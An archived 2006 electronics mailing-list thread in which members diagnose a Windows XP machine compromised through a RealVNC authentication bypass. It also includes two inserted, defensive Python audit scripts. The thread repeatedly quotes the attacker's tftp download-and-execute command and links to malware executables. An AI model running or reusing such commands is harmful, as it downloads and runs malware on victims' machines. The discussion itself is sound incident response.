PICList Thread
'[EE]: WINXP Malware Attacks? CAUTION - POSSIBLE BA'
2006\10\05@144300 by Carey Fisher - NCS

Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:

http://homepage.my-place.us/system.exe

Well, I immediately disabled the network connection and I don't think this program was executed.

Then I scrolled through the Run window and found the following 3 lines:

cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
http://kruma.us/vn.exe  
%SYSTEMROOT%\SYSTEM32\CMD.EXE

This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).

Anybody know anything about any of these apparent attacks?  Any suggestions to prevent this particular exploit (START/Run)?

Thanks,
Carey

2006\10\05@150158 by Orin Eman

On 10/5/06, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks?  Any suggestions to prevent this particular exploit (START/Run)?


Some variant of:

http://www.sophos.com/security/analyses/trojtofgerb.html ?

Try a free trial of PCdefense... http://www.laplink.com/pcdefense/

Run all the scans as you appear to be infected with something.

Orin.

2006\10\05@151500 by Peter Bindels

Sounds like:

http://www.avira.com/en/threats/section/fulldetails/id_vir/1496/worm_rbot.aeu.79.html

BTW, tried the IRC server, it's down. Sounds like an old botnet.
I've also stumbled across (and misplaced) a website that claimed it
could come from using a web browser that supports VBS.

Regards & good luck,
Peter


2006\10\05@153458 by James Newtons Massmind

Check your "autoruns" using autoruns from sysinternals.
http://www.sysinternals.com/Utilities/Autoruns.html This is the list, in
case you don't know, that windows activates when it starts, and is an easy
way for malware to get itself started again when you reboot. Since this
means the malware does not need to modify an existing .exe to get started,
it will NOT appear on most anti-virus scans. Adaware does a better job of
catching these automatically, but I find that getting to know the autoruns
is a better way of combating the problem.

This has more info on your bad .exe
fileinfo.prevx.com/adware/qq276a42612891-WFUD25104328/WFUDPGEMR.EXE.html

"WFUDPGEMR.EXE may use 5 or more path and file names, these are the most
common:
1 :%TEMP%\DHAYZLAUKX.EXE
2 :%WINDIR%\SYSTEM32\WFUDPGEMR1234.EXE"

Each of those may be listed in your autoruns.

Please DO keep us posted? I'm very interested to know what you find.

---
James.


2006\10\05@174705 by Philip Pemberton

Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe        [ URL declawed by PAP ]

ClamAV says:
philpem@wolf:~/MALWARE$ clamscan system_exe
system_exe: Trojan.Mybot-1445 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 71517
Engine version: 0.88.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.32 MB
Time: 46.696 sec (0 m 46 s)

Virusdata from Sophos is here:
http://www.sophos.com/security/analyses/w32rbotadh.html

If you don't have an antivirus installed, go find a clean machine, grab AVG
(from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
get the firewall enabled and block *everything*. Go to
http://housecall.trendmicro.com/ and scan your system. Let it remove any
viruses it finds. Then install AVG.

Looks like pretty much your standard password stealing IRC botnet building
trojan/worm. If I get sufficiently bored, I'll throw it into a VMware sandbox
and pull it to bits with the old IDA freeware release and OllyDebug.

> This really surprised me since I've taken a lot of measures to secure my system
> including a program that won't let new programs run without my permission.
> This is why the first one didn't run.  I also run antivirus, I monitor the
> router/firewall with Wallwatcher, and I block all inbound ports except a
> couple (Skype, FreeVNC).

I notice you're using Outlook Express (the X-Mailer header told me <grin>).
FWIW, there are tons of exploits that allow remote code execution in OE. The
old double-extension bug, buffer overflows, the list goes on. I'd switch to
Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
of your mail and settings from OE).

What antivirus are you using?
I guess you've got a perimeter firewall on the router. Any firewall software
on the machine itself (e.g. ZoneAlarm)?

> Anybody know anything about any of these apparent attacks?  Any suggestions to prevent this particular exploit (START/Run)?

I wonder if someone exploited VNC... What's your VNC password like - all
lowercase and less than 8 characters maybe? And no numbers or symbols? :)

I have my network set up so that you have to SSH in (and use a public key to
authenticate yourself with the server), then you have to tunnel from the
server to the machines inside the network. There are only a few ports open on
the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
from the Internet, I don't add a port-forward, I use an SSH tunnel.

--
Phil.                         |  (\_/)  This is Bunny. Copy and paste Bunny
piclistspamKILLspamphilpem.me.uk         | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/     | (")_(") world domination.

2006\10\05@193823 by Carey Fisher

Thanks for the replies everyone... comments below...

Philip Pemberton wrote:
> Carey Fisher - NCS wrote:
>  
>> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>>
>> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe        [ URL declawed by PAP ]
>>    
>
> ClamAV says:
> philpem@wolf:~/MALWARE$ clamscan system_exe
> system_exe: Trojan.Mybot-1445 FOUND
> ...
>  
....
> If you don't have an antivirus installed, go find a clean machine, grab AVG
> (from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
> get the firewall enabled and block *everything*. Go to
> http://housecall.trendmicro.com/ and scan your system.  Let it remove any
> viruses it finds. Then install AVG.
>  

Yeah, I use AVG and keep it up to date.  I also used McAfee Virus Scan
and nothing can find a virus on that machine.
> I notice you're using Outlook Express (the X-Mailer header told me <grin>).
> FWIW, there are tons of exploits that allow remote code execution in OE. The
> old double-extension bug, buffer overflows, the list goes on. I'd switch to
> Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
> of your mail and settings from OE).
>  
I have Thunderbird on all but that one machine - in fact I'm using
Thunderbird now.  Maybe I should switch that last machine:)

> What antivirus are you using?
> I guess you've got a perimeter firewall on the router. Any firewall software
> on the machine itself (e.g. ZoneAlarm)?
>  
Just using the router for a firewall.  I've scanned it from outside and
no ports are open except VNC & SKYPE.  Also, I've set the DHCP on the
DSL Modem to reset every hour.

>  
>> Anybody know anything about any of these apparent attacks?  Any suggestions to prevent this particular exploit (START/Run)?
>>    
>
> I wonder if someone exploited VNC... What's your VNC password like - all
> lowercase and less than 8 characters maybe? And no numbers or symbols? :)
>  

That's what I'm wondering too...  my pw is >8 char and numbers and letters.
> I have my network set up so that you have to SSH in (and use a public key to
> authenticate yourself with the server), then you have to tunnel from the
> server to the machines inside the network. There are only a few ports open on
> the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
> from the Internet, I don't add a port-forward, I use an SSH tunnel.
>  
I also run StartUpMonitor so any new programs can't get stuck in as
autoruns.

I'll run Ethereal a while and see what I catch.  Maybe set up a
different machine as a "honeypot".

Carey

2006\10\05@195417 by Gerhard Fiedler

Carey Fisher wrote:

> Just using the router for a firewall.  

One reason for using a local firewall is to have better control over the
outgoing connections from your machine.

> I've scanned it from outside and no ports are open except VNC & SKYPE.

What ports do you open for Skype? I use it, and never opened any ports for
it.

> Also, I've set the DHCP on the DSL Modem to reset every hour.

Which doesn't help if you have a trojan on your machine...

I'm not sure whether this is too obvious, but do you know all processes
that run on your machine?

Gerhard

2006\10\05@204725 by Carey Fisher

Gerhard Fiedler wrote:
> Carey Fisher wrote:
>  
>> Just using the router for a firewall.  
>>    
>
> One reason for using a local firewall is to have better control over the
> outgoing connections from your machine.
>
>  
I do have the XP firewall turned on but no third party ones.  And
Wallwatcher has never reported a blocked outbound connection...
hmmmm...blocked....
what about the ones that are not blocked...
{Quote hidden}

I have looked at the process list and looked up ones I didn't recognize
- nothing funny there.

Oh - another clue - never happens when I'm logged out of XP and never
happens when I disable the network connection on the machine.  I also
don't normally run with Admin privileges.

> Gerhard
>  
Carey

2006\10\06@023355 by Ruben Jönsson

> Gerhard Fiedler wrote:
> > Carey Fisher wrote:
> >  
> >> Just using the router for a firewall.  
> >>    
> >
> > One reason for using a local firewall is to have better control over the
> > outgoing connections from your machine.
> >
> >  
> I do have the XP firewall turned on but no third party ones.  And
> Wallwatcher has never reported a blocked outbound connection...
> hmmmm...blocked....
> what about the ones that are not blocked...

The XP firewall does not block outgoing traffic. The new Vista and Windows
Server firewall will.

/Ruben

==============================
Ruben Jönsson
AB Liros Electronic
Box 9124, 200 39 Malmö, Sweden
TEL INT +46 40142078
FAX INT +46 40947388
.....rubenKILLspamspam.....pp.sbbs.se
==============================

2006\10\06@073317 by Gerhard Fiedler

Carey Fisher wrote:

> Oh - another clue - never happens when I'm logged out of XP [...]

AFAIK it's not possible to insert into the keyboard buffer (which seems to
be what is happening) when you're not logged in or while the session is
locked. Which is good (in this case) and can be a pain (when trying to
automate a GUI application with something like AutoIt3 and wanting it to
work while the session is locked).

> [...] and never happens when I disable the network connection on the
> machine.  

Seems you do have an infection. Strange though that no virus scanner
catches it. Maybe you try to make a boot CD (look for BartPE for example)
with a few scanners and run them from the boot CD.

Gerhard

2006\10\06@091019 by Herbert Graf

On Thu, 2006-10-05 at 14:42 -0400, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe  
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).

I'm no expert, but a google search on wfudpgemr.exe resulted in the
following hit:
http://virusinfo.prevx.com/pxparall.asp?PX5=276a54da005930a684a00178b3ce3300aa757be4&psection=desc

> Anybody know anything about any of these apparent attacks?

Not really, haven't been paying much attention.

> Any suggestions to prevent this particular exploit (START/Run)?

Perhaps a little extreme for most, but: run a different OS. MacOS isn't
bad, I run Linux. TTYL

2006\10\06@122141 by Orin Eman

On 10/6/06, Gerhard Fiedler wrote:
> Carey Fisher wrote:
>
> > Oh - another clue - never happens when I'm logged out of XP [...]
>
> AFAIK it's not possible to insert into the keyboard buffer (which seems to
> be what is happening) when you're not logged in or while the session is
> locked. Which is good (in this case) and can be a pain (when trying to
> automate a GUI application with something like AutoIt3 and wanting it to
> work while the session is locked).

It is possible.  Quite easy by inserting an upper filter driver above
the keyboard driver.  It's done by the remote control applications.  It
does need admin rights to install and a reboot.  The really bad thing
is if you remove the driver but don't fix the registry, you lose your
keyboard!

Orin.

2006\10\06@132157 by James Newton


> Oh - another clue - never happens when I'm logged out of XP
> and never happens when I disable the network connection on
> the machine.  I also don't normally run with Admin privileges.


The malware may be starting in your logon script.
http://www.windowsnetworking.com/articles_tutorials/wxpplogs.html

Again, autorun from sysinternals (a free utility) will list all possible
sources for the startup of any program. Finding and removing the entry for
the malware will stop it from gaining control of the system.
http://www.sysinternals.com/Utilities/Autoruns.html

Note that there are many strange looking things that DO need to start, and
you must be careful. Autoruns allows you to filter OUT Microsoft signed
programs, and it has a nice feature to google for the program name which
will generally allow you to see what it does and why.

Be sure to run it after booting in safe mode so that the program will not be
able to re-install itself in the run list after you remove it.

---
James.



2006\10\06@150040 by Paul Hutchinson

> -----Original Message-----
> From: piclist-bouncesspamspam_OUTmit.edu On Behalf Of James Newton
> Sent: Friday, October 06, 2006 1:22 PM
>
>
<snip>
> the malware will stop it from gaining control of the system.
> http://www.sysinternals.com/Utilities/Autoruns.html


That reminds me, also run Sysinternals' RootkitRevealer to see if you've
been taken over by one of the common rootkits.
http://www.sysinternals.com/Utilities/RootkitRevealer.html

Paul

2006\10\07@084442 by Howard Winter

Carey,

On Thu, 05 Oct 2006 19:38:24 -0400, Carey Fisher wrote:

>...
> Just using the router for a firewall.  I've scanned it from outside and
> no ports are open except VNC & SKYPE.

The last time I tried to find out which port(s) Skype uses, I was unable to (they said something like "anything over 1024", which isn't very good for
filtering!).  Which ones do you use/allow through for Skype?

Cheers,


Howard Winter
St.Albans, England


2006\10\07@090552 by peter green


>
> The last time I tried to find out which port(s) Skype uses, I was
> unable to (they said something like "anything over 1024", which
> isn't very good for
> filtering!).  Which ones do you use/allow through for Skype?
i don't use skype because i disapprove of their policies of raping other
users' bandwidth to provide service to those on firewalled networks.

if you must use it i strongly advise against forwarding any ports for it
(even if you find out what listen port it uses) as this may allow your copy
of skype to become a supernode and suck up insane bandwidth (saturating a
100megabit connection is NOT unheard of).


2006\10\07@092402 by Gerhard Fiedler

peter green wrote:

> Howard Winter wrote:
>> The last time I tried to find out which port(s) Skype uses, I was unable
>> to (they said something like "anything over 1024", which isn't very
>> good for filtering!).  Which ones do you use/allow through for Skype?

FWIW, I'm behind an SMC firewall and I don't forward anything for Skype. It
seems to work with outbound connections only.

> i don't use skype because i disaprove of their policies of raping other
> users bandwidth to provide service to those on firewalled networks.

How's that? Do you have more detailed information?

Gerhard

2006\10\09@011824 by Frank Niu


How is this matter going?  Actually I encountered exactly the same virus/worm
and don't know how to get rid of it.

Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
sure it has something to do with VNC: This issue occurs on my 3 machines
with VNC server installed every few minutes, intermittently. After I closed
the VNC server, it seems it won't occur for now.

Any final solution for this?



2006\10\09@064617 by Gerhard Fiedler

Frank Niu wrote:

> I'm pretty sure it has something to do with VNC: This issue occurs with
> my 3 machines with VNC server installed every a few minutes
> intermittently. After I closed VNC server, seems it won't occur for now.
>
> Any final solution for this?

Going with the standard comment "use Linux": use NetMeeting :)

Wouldn't expose it on the Internet, but on a LAN behind a firewall I don't
see a problem.

Gerhard

2006\10\09@093647 by Carey Fisher


Frank Niu wrote:
> How is this matter going?  Actually I encountered exact the same virus/worm
> and don't know how to get rid of it.
>
>  
I've scanned with multiple virus scanners including AVG and Norton.
I've run Adaware and Spybot and I've found nothing at all.

Also, still no intrusions with any one or more of the following true:
VNC stopped
network disconnected
logged out

> Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
> sure it has something to do with VNC: This issue occurs with my 3 machines
> with VNC server installed every a few minutes intermittently. After I closed
> VNC server, seems it won't occur for now.
>
> Any final solution for this?
>  
I'm convinced there is no virus in the machine and it seems someone is
trying to (manually?) type a command in the Start/Run box as if they are
sitting in front of the computer.

So, that sorta leaves VNC except I have it running as a Service which
means if someone was using VNC they could still use it when all users
are logged out except they can't login cause I have a strong password.  
I have 3 machines with VNC but only one is forwarded to from the
router.  That's the one that's being compromised.

Now I'm investigating my Wi-Fi nodes.

Carey

2006\10\09@123414 by Orin Eman


VNC's password encryption _wasn't_ last time I looked.  If you can
sniff the network, it doesn't matter how strong the password is.

As for WiFi, what encryption are you using?  WEP isn't secure.  I've
deliberately sniffed my own network with kismet and run aircrack.  It
took a couple of GB of data, but it found the key.

Orin.

2006\10\09@171709 by Dave Wheeler



A google for VNC vulnerability leads to a mass of undocumented features :-)
Most have been fixed in the latest versions

Dave

2006\10\09@183733 by James Newtons Massmind

> I'm convinced there is no virus in the machine and it seems
> someone is trying to (manually?) type a command in the
> Start/Run box as if they are sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a
> Service which means if someone was using VNC they could still
> use it when all users are logged out except they can't login
> cause I have a strong password.  
> I have 3 machines with VNC but only one is forwarded to from
> the router.  That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
>
> Carey


Wow! Sounds like VNC is being compromised... I would get ethereal (sniffing
the glue that holds the internet together) fired up and set to look for that
string and log any packets containing it.

If it is VNC, I'm sorry to hear it. The boss's daughter just asked me to start
looking for a VPN solution and VNC was on my list to check.

---
James.


2006\10\09@192655 by Gerhard Fiedler

James Newtons Massmind wrote:

> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
> looking for a VPN solution and VNC was on my list to check.

Does VNC include a VPN? I thought it was a remote control server/client
application.

I'm using an SMC Barricade router that has a VPN server built-in. That's
quite convenient and really simple to set up.

BTW, running VNC over a VPN could be a workaround for Carey. This way the
VNC traffic is not exposed directly to the Internet (or the wireless LAN).

Gerhard

2006\10\09@194459 by Bob Blick


>
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to
> start
> looking for a VPN solution and VNC was on my list to check.

Hi James,

VNC is not VPN - but if you are using it on the internet, you should use
it inside a VPN or SSH.

Another remote client/server you might look at is NX (No Machine). It uses
less bandwidth but is much more processor intensive than VNC. And is not
open source (although there are free beer versions). It uses SSH by
default, I believe. (I only use these things locally behind a firewall, so
I don't pay much attention to that part of it).

Cheerful regards,

Bob


2006\10\09@235059 by Rich Mulvey


  One thing to be aware of is that "VNC" is really just a reference to
a protocol, and not a particular application.  There are literally
dozens of different implementations of VNC - some commercial, some open
source, etc.  Some have holes big enough to drive a truck through, while
others are reasonably secure.

  That being said, there's no way in heck I'd ever use any VNC
application that wasn't being tunneled over a VPN or SSH.

- Rich
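The "only over a VPN or SSH" rule from this and the preceding posts has a cheap local check: the VNC server should be bound to loopback only, so nothing but a tunnel terminating on the box can reach it. An added example, not from any poster or VNC project; the netstat listing it parses is constructed.

```python
"""Flag VNC listeners reachable from outside the loopback interface.

Added example for this thread, not from any poster or VNC project. It reads a
Windows `netstat -an`-style listing (constructed below) and reports RFB
displays (5900-5999) and the built-in web/Java viewer (5800-5899) bound to
anything other than 127.0.0.1 / ::1. Bound to loopback, the only way to reach
the server is through a tunnel that terminates on the box, e.g.
ssh -L 5901:127.0.0.1:5900 user@gateway, then a viewer pointed at :5901.
"""
from __future__ import annotations
import re

VNC_RANGES = ((5900, 5999, "RFB display"), (5800, 5899, "VNC web viewer"))
LOOPBACK = {"127.0.0.1", "::1"}

# Proto, local address, foreign address, optional state (UDP rows have none).
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def split_host_port(addr: str) -> tuple[str, int]:
    """Accept '0.0.0.0:5900' and bracketed IPv6 like '[::]:5902'."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def vnc_service(port: int) -> str | None:
    for lo, hi, name in VNC_RANGES:
        if lo <= port <= hi:
            return name
    return None


def audit_listeners(netstat_output: str) -> list[dict]:
    """One finding per VNC TCP listener not confined to loopback."""
    findings = []
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) != "TCP" or m.group(4) != "LISTENING":
            continue
        host, port = split_host_port(m.group(2))
        service = vnc_service(port)
        if service is None or host in LOOPBACK:
            continue
        base = 5900 if service == "RFB display" else 5800
        findings.append({"port": port, "bind": host, "service": service, "display": port - base})
    return findings


# Constructed sample; 203.0.113.7 is a documentation address, not a real peer.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:5901         0.0.0.0:0              LISTENING
  TCP    192.168.1.10:5900      203.0.113.7:51022      ESTABLISHED
  TCP    [::]:5902              [::]:0                 LISTENING
  UDP    0.0.0.0:5900           *:*
"""

if __name__ == "__main__":
    for f in audit_listeners(SAMPLE_NETSTAT):
        print(f"{f['service']} :{f['display']} on {f['bind']}:{f['port']} is reachable off-box")
```

On the sample, the 5800 web viewer, display :0 and the IPv6-bound display :2 are reported, while the loopback-only :1 passes.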


2006\10\10@004747 by Orin Eman

On 10/9/06, Rich Mulvey wrote:
>    One thing to be aware of is that "VNC" is really just a reference to
> a protocol, and not a particular application.  There are literally
> dozens of different implementations of VNC - some commercial, some open
> source, etc.  Some have holes big enough to drive a truck through, while
> others are reasonably secure.
>
>    That being said, there's no way in heck I'd ever use any VNC
> application that wasn't being tunneled over a VPN or SSH.

That's safest...

If you want a (rather old now) SSL enabled VNC, it's available from:

http://www.laplink.com/products/vnc/overview.asp

Orin.

2006\10\10@143658 by James Newtons Massmind

> Hi James,
>
> VNC is not VPN - but if you are using it on the internet, you
> should use it inside a VPN or SSH.

I was suffering from confabulation. ;o)

> Another remote client/server you might look at is NX (No
> Machine). It uses less bandwidth but is much more processor
> intensive than VNC. And is not open source(although there are
> free beer versions). It uses SSH by default, I believe. (I
> only use these things locally behind a firewall, so I don't
> pay much attention to that part of it).

Thanks, I'll check it out.

---
James.


2006\10\10@192508 by Carey Fisher


I understand what you guys are saying and I do have a VPN equipped
router at this location.  
But I need (want?) to access the machine in question from nearly anywhere
and any machine, so I can't count on being able to set up a tunnel from
just anywhere. Maybe I should just run VNC over a VPN connection between
here and the one other place I spend a lot of time.  I can install a VPN
router there.
BTW, I'm running RealVNC and my password is ............ at IP address
192.168.99.257
;)
Carey

2006\10\10@215014 by Jake Anderson


perhaps enable web management of your router (as in from outside) with a
good password.
then allow port forwards from the machine you're on when you want to use
it? rather than from the whole net the whole time.

Otherwise get a "real" firewall (linux style) and put a port knock thing
on (doorman) that will allow you in.

2006\10\10@220752 by Orin Eman


That's what Laplink Everywhere does...  it's not free though.  It uses
a Java VNC viewer to try to cover as many client operating systems as
possible - if you have access to a Java enabled browser, you can
access your VNC server.

I don't recall if the open source Java VNC viewer that's available
from the above link will make a direct connection to a VNC server or
not (if not, the change would be trivial), but it will do SSL as will
the server I originally mentioned.

Orin.

2006\10\10@221927 by Gerhard Fiedler

Carey Fisher wrote:

> I understand what you guys are saying and I do have a VPN equipped router
> at this location. But I need (want?) to access the machine in question
> from nearly anywhere and any machine so I can't count on being able to
> setup a tunnel from just anywhere. Maybe I should just run VNC over a
> VPN connection between here and the one other place I spend a lot of
> time.  I can install a VPN router there.

A PPTP connection is set up pretty quickly on any recent Windows PC, and
doesn't need a special router. (Most let it pass, for one connection at
least.)

Gerhard

2006\10\11@030943 by Orin Eman

On 10/10/06, Gerhard Fiedler wrote:
> Carey Fisher wrote:
>
> > I understand what you guys are saying and I do have a VPN equipped router
> > at this location. But I need (want?) to access the machine in question
> > from nearly anywhere and any machine so I can't count on being able to
> > setup a tunnel from just anywhere. Maybe I should just run VNC over a
> > VPN connection between here and the one other place I spend a lot of
> > time.  I can install a VPN router there.
>
> A PPTP connection is set up pretty quickly on any recent Windows PC, and
> doesn't need a special router. (Most let it pass, for one connection at
> least.)

Whether it works or not is a different matter...

Sorry for the rant, but my copy of XP at home can't handle a bad
packet during the PPTP startup and just sits and sulks.  A Win2k
virtual machine under Vmware on Gentoo Linux however works fine...

Orin.

2006\10\11@032935 by Philip Pemberton

Orin Eman wrote:
> That's what Laplink Everywhere does...  it's not free though.  It uses
> a Java VNC viewer to try to cover as many client operating systems as
> possible - if you have access to a Java enabled browser, you can
> access your VNC server.

TightVNC has a built-in HTTP server and Java client, too. IIRC it runs on port
5800.

--
Phil.                         |  (\_/)  This is Bunny. Copy and paste Bunny
EraseMEpiclistspamphilpem.me.uk         | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/     | (")_(") world domination.

2006\10\11@052328 by Frank Niu


I got an announcement about this issue. It is indeed a VNC-related security
problem. You need to upgrade the VNC version. (I upgraded to 4.1.2)

**********************************
There is a known exposure in some versions of the popular program VNC by
which an attacker can get past the password protection and compromise the
system.   It was found in the "RealVNC" version and an upgrade which fixes
this exposure is available.  Other versions of VNC may or may not be
affected.  

Recently, a program which exploits this vulnerability has been spotted in
the wild.     The corporate threat team is aware of this and has set the
corporate IPS systems to block this worm when spotted and to issue service
desk tickets against the source address (if internal).    At this time,
there is no indication that a "CIO Patch Override" will be needed.


If you currently use RealVNC to remotely access your systems please check
that you have the latest build of your version of RealVNC.  During the
recent Digital Threat and Risk Assessment it was discovered that older
builds of RealVNC have vulnerabilities that can be (and were) exploited to
gain unauthorized access to systems.

You will need to upgrade your version of RealVNC if you have a build date
earlier than MAY 2006.  RealVNC upgrades are available at
http://www.realvnc.com/upgrade.html

*********************************


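The exposure the announcement describes is, in protocol terms, a server that lets a client proceed with an authentication type the server never offered. As an added example (not code from any poster or from RealVNC), the audit below checks a captured RFB 3.7/3.8 security handshake for exactly that, on constructed byte exchanges; the security-type numbers follow the RFB protocol, the sample traffic is made up.

```python
"""Audit a captured RFB (VNC) security handshake for an unoffered auth type.

Added example for this thread, not code from any VNC project. The byte
layout follows RFB 3.7/3.8; all sample exchanges below are constructed.
"""
from __future__ import annotations
from dataclasses import dataclass

SEC_NONE = 1  # "None": no authentication at all
SEC_TYPE_NAMES = {1: "None", 2: "VNC Authentication", 16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def parse_protocol_version(msg: bytes) -> tuple[int, int]:
    """ProtocolVersion is exactly 12 bytes: b'RFB xxx.yyy\\n'."""
    if len(msg) != 12 or msg[:4] != b"RFB " or msg[7:8] != b"." or msg[-1:] != b"\n":
        raise ValueError(f"malformed ProtocolVersion: {msg!r}")
    return int(msg[4:7]), int(msg[8:11])


def parse_server_security_types(msg: bytes) -> list[int]:
    """RFB >= 3.7: U8 count, then count U8 security types; count 0 = refused."""
    if not msg:
        raise ValueError("empty security-types message")
    count = msg[0]
    if count == 0:
        raise ValueError("server refused the connection (zero security types)")
    if len(msg) != 1 + count:
        raise ValueError("security-types list length mismatch")
    return list(msg[1:])


@dataclass
class Handshake:
    server_version: bytes         # server -> client ProtocolVersion
    client_version: bytes         # client -> server ProtocolVersion (negotiated version)
    server_security_types: bytes  # server -> client: the types it offers
    client_security_type: bytes   # client -> server: one-byte choice
    server_continued: bool        # True if the server went on to SecurityResult/ServerInit


def audit_handshake(hs: Handshake) -> list[str]:
    """Return findings; an empty list means the exchange looked sane."""
    findings: list[str] = []
    s_ver = parse_protocol_version(hs.server_version)
    c_ver = parse_protocol_version(hs.client_version)
    if c_ver > s_ver:
        findings.append(f"client requested RFB {c_ver[0]}.{c_ver[1]} above the server's {s_ver[0]}.{s_ver[1]}")
    if c_ver < (3, 7):
        # In 3.3 the server dictates the type as a U32; that needs a different audit.
        findings.append("pre-3.7 handshake: server chooses the security type, audit the U32 instead")
        return findings
    offered = parse_server_security_types(hs.server_security_types)
    if SEC_NONE in offered:
        findings.append("server offers security type 1 (None): no password required at all")
    if len(hs.client_security_type) != 1:
        raise ValueError("client security-type choice must be exactly one byte")
    chosen = hs.client_security_type[0]
    if chosen not in offered:
        name = SEC_TYPE_NAMES.get(chosen, "unknown")
        msg = f"client selected security type {chosen} ({name}) that the server never offered"
        if hs.server_continued:
            msg += "; server accepted it, matching the pre-4.1.2 RealVNC authentication bypass"
        else:
            msg += "; server dropped the connection as the protocol requires"
        findings.append(msg)
    return findings


# Constructed sample traffic (not captures from the thread).
V38 = b"RFB 003.008\n"
BENIGN = Handshake(V38, V38, b"\x01\x02", b"\x02", True)            # offers VNC auth, client takes it
BYPASS_ACCEPTED = Handshake(V38, V38, b"\x01\x02", b"\x01", True)   # client picks None, server goes on
BYPASS_REJECTED = Handshake(V38, V38, b"\x01\x02", b"\x01", False)  # same probe, patched server hangs up
OPEN_SERVER = Handshake(V38, V38, b"\x02\x01\x02", b"\x01", True)   # server itself offers None

if __name__ == "__main__":
    for label, hs in [("benign", BENIGN), ("bypass accepted", BYPASS_ACCEPTED),
                      ("bypass rejected", BYPASS_REJECTED), ("open server", OPEN_SERVER)]:
        print(label, "->", audit_handshake(hs) or ["no findings"])
```

The same check run inline at the gateway is what an IPS rule for this worm amounts to: a selected type outside the offered list, followed by the server continuing, is the signature.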

2006\10\11@064506 by Bob Axtell

Frank Niu wrote:
> I got an announcement about this issue. It is indeed a VNC-related security
> problem. You need to upgrade the VNC version. (I upgraded to 4.1.2)
>
> **********************************
> There is a known exposure in some versions of the popular program VNC by
> which an attacker can get past the password protection and compromise the
> system.   It was found in the "RealVNC" version and an upgrade which fixes
> this exposure is available.  Other versions of VNC may or may not be
> affected.  
>  
That's a very important catch, Frank. Thanks!

--Bob


2006\10\11@093308 by Gerhard Fiedler

Orin Eman wrote:

>> A PPTP connection is set up pretty quickly on any recent Windows PC, and
>> doesn't need a special router. (Most let it pass, for one connection at
>> least.)
>
> Whether it works or not is a different matter...
>
> Sorry for the rant, but my copy of XP at home can't handle a bad
> packet during the PPTP startup and just sits and sulks.  A Win2k
> virtual machine under Vmware on Gentoo Linux however works fine...

Well, yes, YMMV :)  

FWIW, I use PPTP regularly to connect to my home LAN (SMC router with
built-in VPN server) from my WinXP Pro notebook, and I never had a problem.

Gerhard

2006\10\11@144340 by Richard Prosser

As does UltraVNC.
RP


2006\10\11@202439 by Carey Fisher

Bob Axtell wrote:
> Frank Niu wrote:
>  
>> I got an announcement about this issue. It is indeed a VNC-related security
>> problem. You need to upgrade the VNC version. (I upgraded to 4.1.2)
>>
>> **********************************
>> There is a known exposure in some versions of the popular program VNC by
>> which an attacker can get past the password protection and compromise the
>> system.   It was found in the "RealVNC" version and an upgrade which fixes
>> this exposure is available.  Other versions of VNC may or may not be
>> affected.  
>>  
>>    
> That's a very important catch, Frank. Thanks!
>
> --Bob
>
>  
Yes, thanks Frank!
Carey

2006\10\11@202607 by Carey Fisher


Gerhard,
I like your approach and am going to try it - VPN server-in-router at
main location, setup PPTP at the other end.
Thanks,
Carey

2006\10\12@091335 by Gerhard Fiedler

Carey Fisher wrote:

